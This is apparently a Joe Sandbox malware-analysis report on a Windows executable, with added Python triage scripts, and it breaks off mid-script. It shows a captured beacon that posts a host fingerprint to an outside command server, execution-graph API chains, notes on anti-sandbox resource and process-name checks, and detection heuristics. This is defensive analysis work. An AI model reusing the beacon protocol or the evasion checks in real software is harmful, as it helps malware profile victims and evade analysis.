                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.11 | 49715 | 34.226.108.155 | 443 | 7772 | C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-20 16:30:32 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 16:30:32 UTC | 224 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 16:30:32 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 16:30:32 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}
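The three HTTP sessions above form one beacon: a GET to httpbin.org/ip over TLS to learn the victim's public address, a JSON POST of a host fingerprint (public IP, clock, CPU and RAM counts, drives, display geometry, recent-file count, process list) to home.twentytk20pn.top, and a follow-up POST made after the server answered 503. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it decodes the report's "Data Raw" hex dumps offline, recovers the scalar fields from the truncated fingerprint body, parses the complete 143-byte follow-up, and lists the request traits a detection rule could key on. All inputs are copied from the session dumps above; the path-shape heuristic is an assumption drawn from this single capture, and the reading of current_time as Unix seconds is an assumption checked only against the capture's own timestamps.

```python
import json
import re
from datetime import datetime, timezone

# Constructed input: session 0's request head, copied from the report's session dump.
SESSION0_HEADERS = (
    "POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1\r\n"
    "Host: home.twentytk20pn.top\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 577602\r\n"
)

# Constructed input: the untruncated leading bytes of session 0's "Data Raw" dump
# (the report cuts the 577602-byte body short, so this is not valid JSON on its own).
SESSION0_BODY_PREFIX_HEX = (
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 "
    "6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 32 32 33 31 22 2c 20 22 4e 75 6d 5f 70 "
    "72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 "
    "72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 "
    "61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c"
)

# Constructed input: session 1's complete 143-byte body, copied from the report.
SESSION1_BODY_HEX = (
    "7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 "
    "53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 "
    "73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 "
    "74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c "
    "3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d"
)


def decode_hex_dump(hex_text: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex dump back into the bytes that went on the wire."""
    return bytes.fromhex(hex_text)


def parse_request_head(raw: str) -> dict:
    """Split an HTTP/1.1 request head into method, path and a lower-cased header map."""
    lines = raw.strip().split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def beacon_indicators(raw: str) -> list:
    """List the traits of the captured request that a detection rule could key on."""
    req = parse_request_head(raw)
    h = req["headers"]
    hits = []
    if "user-agent" not in h:
        hits.append("no User-Agent header")
    if req["method"] == "POST" and h.get("content-type", "").startswith("application/json"):
        hits.append("JSON POST")
    if int(h.get("content-length", "0")) > 100_000:
        hits.append("large body (%s bytes)" % h["content-length"])
    # Heuristic assumed from this one capture: 20 letters then a 10-digit number.
    if re.fullmatch(r"/[A-Za-z]{20}\d{10}", req["path"]):
        hits.append("path is 20 letters followed by 10 digits")
    return hits


def recover_scalars(partial_json: bytes) -> dict:
    """Pull "key": scalar pairs out of a truncated JSON body that json.loads rejects."""
    # Nested keys (name/all/free inside "drivers") are collected too; first occurrence wins.
    text = partial_json.decode("utf-8", errors="replace")
    pair = re.compile(r'"([^"\\]+)"\s*:\s*("(?:[^"\\]|\\.)*"|-?\d+(?:\.\d+)?)')
    found = {}
    for key, value in pair.findall(text):
        found.setdefault(key, json.loads(value))
    return found


def epoch_to_utc(value: str) -> datetime:
    """Read a decimal string as Unix seconds (assumed encoding of the beacon's current_time)."""
    return datetime.fromtimestamp(int(value), tz=timezone.utc)


def triage() -> dict:
    """Run every step over the captured material and return the findings."""
    fingerprint = recover_scalars(decode_hex_dump(SESSION0_BODY_PREFIX_HEX))
    follow_up_bytes = decode_hex_dump(SESSION1_BODY_HEX)
    follow_up = json.loads(follow_up_bytes)
    return {
        "indicators": beacon_indicators(SESSION0_HEADERS),
        "victim_public_ip": fingerprint["ip"],
        "victim_clock_utc": epoch_to_utc(fingerprint["current_time"]).isoformat(),
        "cpu_count": fingerprint["Num_processor"],
        "num_ram": fingerprint["Num_ram"],
        "follow_up_len": len(follow_up_bytes),
        "follow_up_data": follow_up["data"],
        # The implant sent the server's 503 HTML back as "id1": it stored an error page as its id.
        "follow_up_echoes_error_page": follow_up["id1"].startswith("<html><body><h1>503"),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, "=", value)
```

The recovered current_time (1734712231) decodes to 2024-12-20 16:30:31 UTC, one second before the httpbin request logged at 16:30:32 UTC, which is what makes the Unix-seconds reading credible. The follow-up shows the client-side protocol has no error handling: whatever the server returns to the first POST is stored as id1 and reported back with "Done1", so a sinkholed or overloaded C2 still receives the second request.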



                                                            Target ID: 0
                                                            Start time: 11:30:27
                                                            Start date: 20/12/2024
                                                            Path: C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: "C:\Users\user\Desktop\Tsy9P2T9yF.exe"
                                                            Imagebase: 0x4b0000
                                                            File size: 4'448'768 bytes
                                                            MD5 hash: 03AE071235D37EDC3EA30848462BCCBC
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: low
                                                            Has exited: true


                                                            Execution Graph

                                                            Execution Coverage: 3.4%
                                                            Dynamic/Decrypted Code Coverage: 27.6%
                                                            Signature Coverage: 16.1%
                                                            Total number of Nodes: 490
                                                            Total number of Limit Nodes: 65

                                                            [Interactive execution graph not reproduced. API calls named on the graph's nodes, grouped by the call chains the graph shows:]
                                                            - Winsock / networking: WSAStartup, socket, ioctlsocket, connect, getsockname, closesocket, send, recv, WSAIoctl, setsockopt, WSAEventSelect, WSAEnumNetworkEvents, WSACloseEvent, select, __WSAFDIsSet, WSAGetLastError, gethostname, GetAdaptersAddresses
                                                            - Host fingerprinting: GetSystemInfo, GlobalMemoryStatusEx, GetLogicalDrives, GetDriveTypeA, GetDiskFreeSpaceExA, FindFirstFileA, FindFirstFileW, FindNextFileW, Process32FirstW, QueryFullProcessImageNameA, CharUpperA, CloseHandle
                                                            - Registry: RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey
                                                            - Other: Sleep, vfprintf, KiUserCallbackDispatcher
                                                            Most nodes sit at 0x4b1xxx to 0x58xxxx, inside the loaded image (imagebase 0x4b0000); the GetLogicalDrives and Process32FirstW chains run at 0x714xxxx and 0x718xxxx, far outside that image.
82318->82319 82319->82313 82321 4ed0e5 82320->82321 82326 4ecd9a 82320->82326 82321->82318 82322 4ed0b4 82341 4cf6c0 10 API calls 82322->82341 82326->82321 82331 4ece6b 82326->82331 82336 4edc30 socket ioctlsocket connect getsockname closesocket 82326->82336 82327 4ed064 82327->82322 82340 4ede00 socket ioctlsocket connect getsockname closesocket 82327->82340 82329 4ecf4b 82332 4ed016 82329->82332 82334 4c6fa0 4 API calls 82329->82334 82338 4ee130 socket ioctlsocket connect getsockname closesocket 82329->82338 82331->82327 82331->82329 82337 4edc30 socket ioctlsocket connect getsockname closesocket 82331->82337 82332->82327 82339 4ede00 socket ioctlsocket connect getsockname closesocket 82332->82339 82334->82329 82335->82316 82336->82326 82337->82331 82338->82329 82339->82332 82340->82327 82341->82321 82164 4b2f17 82171 4b2f2c 82164->82171 82165 4b31d3 82166 4b2fb3 RegOpenKeyExA 82166->82171 82167 4b315c RegEnumKeyExA 82167->82171 82168 4b3046 RegOpenKeyExA 82169 4b3089 RegQueryValueExA 82168->82169 82168->82171 82170 4b313b RegCloseKey 82169->82170 82169->82171 82170->82171 82171->82165 82171->82166 82171->82167 82171->82168 82171->82170 82172 4b31d7 82175 4b31f4 82172->82175 82173 4b3200 82174 4b32dc CloseHandle 82174->82173 82175->82173 82175->82174 82176 4e8b50 82177 4e8b6b 82176->82177 82194 4e8bb5 82176->82194 82178 4e8b8f 82177->82178 82179 4e8bf3 82177->82179 82177->82194 82215 4c6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 82178->82215 82196 4ea550 82179->82196 82182 4e8bfc 82185 4e8c1f connect 82182->82185 82186 4e8c35 82182->82186 82193 4e8cb2 82182->82193 82182->82194 82183 4e8cd9 SleepEx getsockopt 82187 4e8d18 82183->82187 82184 4ea150 getsockname 82192 4e8dff 82184->82192 82185->82186 82211 4ea150 82186->82211 82188 4e8d43 82187->82188 82187->82193 82191 4ea150 getsockname 82188->82191 82191->82194 82192->82194 82216 4b78b0 closesocket 82192->82216 82193->82184 82193->82192 82193->82194 82195 4e8ba1 82195->82183 82195->82193 82195->82194 82197 
4ea575 82196->82197 82201 4ea597 82197->82201 82218 4b75e0 82197->82218 82199 4b78b0 closesocket 82200 4ea713 82199->82200 82200->82182 82202 4ea811 setsockopt 82201->82202 82207 4ea83b 82201->82207 82209 4ea69b 82201->82209 82202->82207 82204 4eaf56 82205 4eaf5d 82204->82205 82204->82209 82205->82200 82206 4ea150 getsockname 82205->82206 82206->82200 82207->82209 82210 4eabe1 82207->82210 82224 4e6be0 13 API calls 82207->82224 82209->82199 82209->82200 82210->82209 82223 5167e0 ioctlsocket 82210->82223 82212 4ea15f 82211->82212 82214 4ea1d0 82211->82214 82213 4ea181 getsockname 82212->82213 82212->82214 82213->82214 82214->82195 82215->82195 82217 4b78c5 82216->82217 82217->82194 82219 4b75ef 82218->82219 82220 4b7607 socket 82218->82220 82219->82220 82222 4b7643 82219->82222 82221 4b762b 82220->82221 82221->82201 82222->82201 82223->82204 82224->82210 82342 4e95b0 82343 4e95c8 82342->82343 82344 4e95fd 82342->82344 82343->82344 82345 4ea150 getsockname 82343->82345 82345->82344 82346 8ed270 82348 8ed29a 82346->82348 82347 8ed2a6 82348->82347 82351 8412a0 82348->82351 82350 8ed2da 82352 8412ac 82351->82352 82355 83e030 82352->82355 82354 8412da 82354->82350 82357 83e07d 82355->82357 82390 83e4e3 82355->82390 82356 83e186 82356->82354 82357->82356 82358 83e368 82357->82358 82359 83e223 82357->82359 82360 83df40 fgetc 82357->82360 82361 83e16e 82357->82361 82357->82390 82358->82356 82366 83eb32 82358->82366 82375 83e699 82358->82375 82358->82390 82391 840098 ungetc 82358->82391 82396 83df40 fgetc 82358->82396 82359->82356 82384 83e24f 82359->82384 82392 83df40 fgetc 82359->82392 82360->82357 82361->82356 82364 83ed70 ungetc 82361->82364 82364->82356 82365 840230 ungetc 82365->82390 82368 83eb43 82366->82368 82369 83e7fa 82366->82369 82367 841184 ungetc 82367->82390 82370 83f0b5 82368->82370 82386 83eb5a 82368->82386 82377 83e830 82369->82377 82369->82386 82397 83df40 fgetc 82370->82397 82374 840722 ungetc 82374->82356 82382 83e6c4 82375->82382 82375->82386 
82375->82390 82376 8408b7 ungetc 82376->82390 82377->82356 82394 83df40 fgetc 82377->82394 82381 83f0c8 82381->82356 82381->82390 82398 83df40 fgetc 82381->82398 82382->82356 82393 83df40 fgetc 82382->82393 82384->82356 82384->82374 82385 83ffe6 ungetc 82385->82390 82386->82356 82386->82390 82395 83df40 fgetc 82386->82395 82387 83fec7 82399 83dfd0 ungetc 82387->82399 82388 840e1e ungetc 82388->82390 82389 83df40 fgetc 82389->82390 82390->82356 82390->82365 82390->82367 82390->82376 82390->82384 82390->82385 82390->82387 82390->82388 82390->82389 82400 83dfd0 ungetc 82390->82400 82391->82358 82392->82359 82393->82390 82394->82390 82395->82390 82396->82358 82397->82381 82398->82381 82399->82356 82400->82390 82401 4e6ab0 82402 4e6ad5 82401->82402 82403 4e6bb4 82402->82403 82405 4c6fa0 4 API calls 82402->82405 82404 565ed0 9 API calls 82403->82404 82406 4e6ba9 82404->82406 82407 4e6b54 82405->82407 82407->82403 82407->82406 82408 4e6b5d 82407->82408 82408->82406 82410 565ed0 82408->82410 82413 565a50 82410->82413 82412 565ee5 82412->82408 82414 565a58 82413->82414 82419 565ea0 82413->82419 82415 565b50 82414->82415 82417 565b88 82414->82417 82429 565a99 82414->82429 82415->82417 82420 565eb4 82415->82420 82421 565b7a 82415->82421 82416 565e96 82448 579480 socket ioctlsocket connect getsockname closesocket 82416->82448 82426 565cae 82417->82426 82446 565ef0 socket ioctlsocket connect getsockname 82417->82446 82419->82412 82449 566f10 socket ioctlsocket connect getsockname closesocket 82420->82449 82438 5670a0 82421->82438 82425 565ec2 82425->82425 82426->82416 82428 565da1 __WSAFDIsSet 82426->82428 82434 57a920 82426->82434 82447 579320 socket ioctlsocket connect getsockname closesocket 82426->82447 82427 565be2 __WSAFDIsSet 82427->82429 82428->82426 82429->82417 82429->82427 82431 5670a0 6 API calls 82429->82431 82445 566f10 socket ioctlsocket connect getsockname closesocket 82429->82445 82431->82429 82435 57a944 82434->82435 82436 57a977 send 82435->82436 82437 57a94b 
82435->82437 82436->82426 82437->82426 82442 5670ae 82438->82442 82440 5671a7 82440->82417 82441 56717f 82441->82440 82455 579320 socket ioctlsocket connect getsockname closesocket 82441->82455 82442->82440 82442->82441 82450 57a8c0 82442->82450 82454 5671c0 socket ioctlsocket connect getsockname 82442->82454 82445->82429 82446->82417 82447->82426 82448->82419 82449->82425 82451 57a8e6 82450->82451 82452 57a903 recvfrom 82450->82452 82451->82452 82453 57a8ed 82451->82453 82452->82453 82453->82442 82454->82442 82455->82440
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 2c03bb6476cd43d93105d0a6ee9fb4c17a1c91cf76cdb82034a41fd637768c47
                                                              • Instruction ID: db0be4b5bb2735adc8cc1beb34bbbb8ed666770858c07b934a18b62f4849f4a6
                                                              • Opcode Fuzzy Hash: 2c03bb6476cd43d93105d0a6ee9fb4c17a1c91cf76cdb82034a41fd637768c47
                                                              • Instruction Fuzzy Hash: 2DC2AF31A043849FD714CF2AC480B6BB7E1BF84318F05866EED989B352D775E989CB85

                                                              Control-flow Graph
                                                              Control-flow graph of the routine at 0x4b255d, rendered as an image in the original report; the node/edge dump is omitted here. Structure recoverable from it: GetSystemInfo and GlobalMemoryStatusEx at entry (0x4b255d-0x4b2614); a call through one of 32 small stubs at 0x7140000-0x7140385; a loop at 0x4b263c-0x4b2751 that calls GetDriveTypeA and, on one branch, GetDiskFreeSpaceExA; then KiUserCallbackDispatcher and a FindFirstFileW/FindNextFileW enumeration loop at 0x4b28d9-0x4b2926. CPU count, RAM size and disk size read in one routine is the usual survey for telling a small analysis VM from a real host.
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 004B2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 004B25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 004B2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 004B267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 004B27E2
                                                              • FindFirstFileW.KERNELBASE ref: 004B28F8
                                                              • FindNextFileW.KERNELBASE ref: 004B291F
                                                              Strings
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%K$@$`
                                                              • API String ID: 3271271169-2163641105
                                                              • Opcode ID: 4b22af700c29e6b846c0a849bf79b1dbba82dfaa869cc9d95d93d2f329553a38
                                                              • Instruction ID: 953aad7846717878507280756f68b69350ea4d2e7aa3d823c98ee1f4607371c6
                                                              • Opcode Fuzzy Hash: 4b22af700c29e6b846c0a849bf79b1dbba82dfaa869cc9d95d93d2f329553a38
                                                              • Instruction Fuzzy Hash: 74D1B1B49053099FCB10EF69C98569EBBF0FF88344F018969E898D7351E7749A84CF92

                                                              Control-flow Graph
                                                              Control-flow graph of the routine at 0x4b29ff, rendered as an image in the original report; the node/edge dump is omitted here, and because the report prints no APIs list for this routine the calls named here come from the graph. Sequence: FindFirstFileA (0x4b29ff), RegOpenKeyExA (0x4b2a3d), CharUpperA (0x4b2a9f), a loop at 0x4b2b94-0x4b2bca, a block at 0x4b2bcc-0x4b2c66 calling QueryFullProcessImageNameA and CloseHandle, a second loop at 0x4b2cef-0x4b2dc9 built from repeated calls to the helper at 0x838da0, and a final CloseHandle at 0x4b2dcf-0x4b2e1c. Reading process image paths and upper-casing strings before comparing them is the shape of an analysis-tool process-name check.
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 304e4cfd02be2b60d738bd604341c54ac581bbc5b7cc9e7eece425694f2ba1b1
                                                              • Instruction ID: 49520ab99ea655626f927bc2adebe6e2289c1411e6951742363656b294f20ff6
                                                              • Opcode Fuzzy Hash: 304e4cfd02be2b60d738bd604341c54ac581bbc5b7cc9e7eece425694f2ba1b1
                                                              • Instruction Fuzzy Hash: 80E1E6B0904309DFCB50EF68D98469EBBF4EF84300F01886AE488D7351E778DA858F52
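The APIs blocks above are what an analyst reads first: the routine at 0x4b255d pairs GetSystemInfo and GlobalMemoryStatusEx with GetDiskFreeSpaceExA (CPU count, RAM and disk size, the small-VM test), the one at 0x4b29ff reads process image names and upper-cases strings before comparing them, and the String ID field of the execution graph carries libcurl's connect.c messages. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses the report's API bullet lines in both shapes the report uses (with and without an argument list before "ref:") and its '$'-joined String ID field, and maps each routine to behaviour tags. The tag names, rule sets and library marker set are this example's own assumptions. The sample inputs are copied from this report's blocks, except the 0x4b29ff API names, which are taken from its graph because the report prints no APIs list for that routine.

```python
"""Triage helper for the per-function blocks of a Joe Sandbox report.

Added example for this page: not Joe Sandbox code and not code from the sample.
Tag names, rule sets and library markers are assumptions chosen to match the
routines documented above.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Both bullet shapes the report uses in its "APIs" blocks:
#   "• GetDriveTypeA.KERNELBASE ref: 004B2647"
#   "• WSAEventSelect.WS2_32(?,?,?), ref: 004C0712"
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    addr: int  # call-site address as printed by the report


def parse_api_lines(block: str) -> list[ApiRef]:
    """Extract (api, module, call address) from the text of an APIs block."""
    refs = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m:
            refs.append(ApiRef(m["api"], m["module"], int(m["addr"], 16)))
    return refs


def canonical(api: str) -> str:
    """Strip a trailing Ex/A/W so one rule covers GetDiskFreeSpaceExA and ...ExW."""
    return re.sub(r"(?:Ex)?[AW]?$", "", api)


# Assumed rule set: API families that, seen together in one routine, earn a tag.
RULES = {
    # CPU count + RAM size + disk size in one place: the "is this host too
    # small to be a real user's machine?" check used against sandboxes.
    "host_resource_fingerprint": {"GetSystemInfo", "GlobalMemoryStatus", "GetDiskFreeSpace"},
    "drive_and_file_enumeration": {"GetDriveType", "FindFirstFile", "FindNextFile"},
    # Process image paths read back and upper-cased before comparison: the
    # shape of an analysis-tool process-name blacklist.
    "process_name_inspection": {"QueryFullProcessImageName", "CharUpper"},
    "async_winsock_wait": {"WSAEventSelect", "WSAEnumNetworkEvents"},
}

# Assumed markers: strings that identify a statically linked library.
LIBRARY_MARKERS = {
    "libcurl lib/connect.c": {"connect.c", "all eyeballers failed", "ipv4", "ipv6"},
}


def tag_apis(api_names) -> list[str]:
    seen = {canonical(name) for name in api_names}
    return sorted(tag for tag, needed in RULES.items() if needed <= seen)


def triage_block(block: str) -> list[str]:
    return tag_apis(ref.api for ref in parse_api_lines(block))


def identify_libraries(string_id_field: str) -> list[str]:
    """The report joins a routine's strings with '$'; match the library markers."""
    strings = set(string_id_field.split("$"))
    return sorted(lib for lib, marks in LIBRARY_MARKERS.items() if marks <= strings)


# Sample input copied from this report's APIs blocks (0x4b255d and 0x4c05b0).
FUNC_4B255D = """
• GetSystemInfo.KERNELBASE ref: 004B2579
• GlobalMemoryStatusEx.KERNELBASE ref: 004B25CC
• GetDriveTypeA.KERNELBASE ref: 004B2647
• GetDiskFreeSpaceExA.KERNELBASE ref: 004B267E
• KiUserCallbackDispatcher.NTDLL ref: 004B27E2
• FindFirstFileW.KERNELBASE ref: 004B28F8
• FindNextFileW.KERNELBASE ref: 004B291F
"""
FUNC_4C05B0 = """
• WSAEventSelect.WS2_32(?,?,?), ref: 004C0712
• WSAEventSelect.WS2_32(?,00000000), ref: 004C09DD
• WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004C09FC
"""
# The report prints no APIs list for 0x4b29ff; names taken from its graph.
FUNC_4B29FF_APIS = ["FindFirstFileA", "RegOpenKeyExA", "CharUpperA",
                    "QueryFullProcessImageNameA", "CloseHandle"]
# String ID field of the execution graph, copied verbatim from the report.
CONNECT_STRINGS = ("%s assess started=%d, result=%d$%s connect -> %d, connected=%d$"
                   "%s connect timeout after %lldms, move on!$%s done$"
                   "%s starting (timeout=%lldms)$%s trying next$"
                   "Connected to %s (%s) port %u$Connection time-out$"
                   "Connection timeout after %lld ms$"
                   "Failed to connect to %s port %u after %lld ms: %s$"
                   "all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6")

if __name__ == "__main__":
    print("0x4b255d", triage_block(FUNC_4B255D))
    print("0x4c05b0", triage_block(FUNC_4C05B0))
    print("0x4b29ff", tag_apis(FUNC_4B29FF_APIS))
    print("execution graph strings", identify_libraries(CONNECT_STRINGS))
```

Run it over the text of each function block. A routine that earns host_resource_fingerprint and drive_and_file_enumeration at once is the one to read first; the networking code can be deprioritised once the strings show it is libcurl rather than something custom.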

                                                              Control-flow Graph
                                                              Control-flow graph of the routine at 0x4c05b0, rendered as an image in the original report; the node/edge dump is omitted here. WSAEventSelect is called at 0x4c0707 and again inside the loop at 0x4c09d0-0x4c0a17, where it alternates with WSAEnumNetworkEvents: an event-driven Winsock wait loop rather than a blocking connect.
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 004C0712
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 004C09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004C09FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=K$multi.c
                                                              • API String ID: 2170980988-3269766730
                                                              • Opcode ID: 4903e1aa09b530ed71226e4385cb7fd0e6d797fe8bd4cf70491bae0bbd00cd0b
                                                              • Instruction ID: 13434b525637176ad07e67d1b31c5b0cf150199fe0ad3e3d592b9bba70663a16
                                                              • Opcode Fuzzy Hash: 4903e1aa09b530ed71226e4385cb7fd0e6d797fe8bd4cf70491bae0bbd00cd0b
                                                              • Instruction Fuzzy Hash: 3AD1E179609301DFE750DF25C881BABB7E9FF94308F04882EF88582251E778E945CB5A
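Added example (not part of the Joe Sandbox report): the .sdmp file names in the Memory Dump Source list above encode the dumped region's base address, page protection and memory type as hex fields. The field layout assumed here is `<pid>.<stage>.<dump id>.<base address>.<protection>.<field 6>.<type>.<field 8>.sdmp`; only fields 4, 5 and 7 are decoded, using the standard Win32 PAGE_* and MEM_* constants, and the other fields are kept raw. The sample input is the dump list of this function copied from the report. A region that decodes to PAGE_EXECUTE_READWRITE inside a MEM_IMAGE mapping is loaded PE code that has been made writable at runtime, which is the footprint an unpacker leaves when it rewrites section rights, so the decoder also returns those bases as a quick triage check.

```python
import re
from dataclasses import dataclass

# Win32 page protection values (winnt.h). Modifier bits PAGE_GUARD (0x100),
# PAGE_NOCACHE (0x200) and PAGE_WRITECOMBINE (0x400) are masked off before lookup.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
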